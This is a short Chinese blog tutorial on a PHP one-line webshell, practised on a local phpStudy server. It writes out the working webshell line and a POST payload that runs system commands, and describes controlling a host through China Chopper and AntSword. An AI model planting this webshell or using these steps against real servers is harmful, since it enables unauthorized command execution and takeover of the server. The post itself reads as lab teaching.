Webshell——一句话木马实操
1.配置Web环境
打开phpStudy启动服务,使得界面的运行状态全部变成绿色,此时可以在浏览器使用127.0.0.1
访问Web服务
2.创建木马文件
在phpStudy的界面点击其他选项菜单
进入网站的根目录
在根目录中新建一个PHP的一句话木马文件,命名为hack.php
,里面添加木马语句
1 | eval($_POST['aaa']); @ |
保存后退出编辑即可
3.利用Webshell
1)使用HackBar插件
在浏览器中安装HackBar插件,按F12
打开开发者工具,访问http://127.0.0.1/hack.php
界面不会显示任何东西
然后点开开发者工具中的HackBar选项卡,将地址栏中的地址粘贴在下面,选中Post Data
选项在下面填入aaa=system('ipconfig');
,其中这里的aaa
是上面在创建木马文件的时候POST里面的参数
填写完毕后点击Execution
就可以通过木马执行服务器中的命令,就可以直接在Web页面看到命令执行后的结果
2)使用中国菜刀
打开中国菜刀首先添加一条记录,右键添加
如图所示,先在地址栏填写一句话木马的URL,后面的框填写木马中POST里面设置的参数,完成后点击添加
添加后在菜刀的主界面就会出现一条记录,右键这条记录就可以以不同的方式连接到Web服务器主机
可以通过文件管理对目标主机中的任意文件进行操作,通过虚拟终端可以通过命令行的形式对目标主机进行操控
3)使用蚁剑
使用方法与中国菜刀基本相同
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 BayMRX!
评论